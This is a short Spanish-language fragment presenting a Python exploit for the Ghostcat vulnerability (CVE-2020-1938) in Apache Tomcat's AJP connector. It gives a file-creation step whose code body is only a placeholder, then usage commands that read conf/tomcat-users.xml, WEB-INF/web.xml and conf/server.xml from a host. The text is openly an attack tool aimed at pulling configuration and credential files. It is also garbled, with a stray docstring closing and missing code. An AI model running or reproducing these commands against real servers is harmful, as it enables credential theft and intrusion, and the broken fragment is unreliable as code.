
Exploit en Python para CVE-2020-1938 (Ghostcat) que lee archivos arbitrarios de servidores Apache Tomcat a través del conector AJP en el puerto 8009, incluidos archivos de configuración y credenciales.
Ghostcat - CVE-2020-1938 Exploit Lee archivos del Tomcat via AJP connector (puerto 8009) Uso: python3 ghostcat.py [archivo] """
cat > ghostcat.py << 'PYEOF' [AQUÍ VA EL CÓDIGO COMPLETO DE ARRIBA] PYEOF
chmod +x ghostcat.py
python3 ghostcat.py ejemplo.com conf/tomcat-users.xml 8009
python3 ghostcat.py ejemplo.com WEB-INF/web.xml 8009
python3 ghostcat.py ejemplo.com conf/server.xml 8009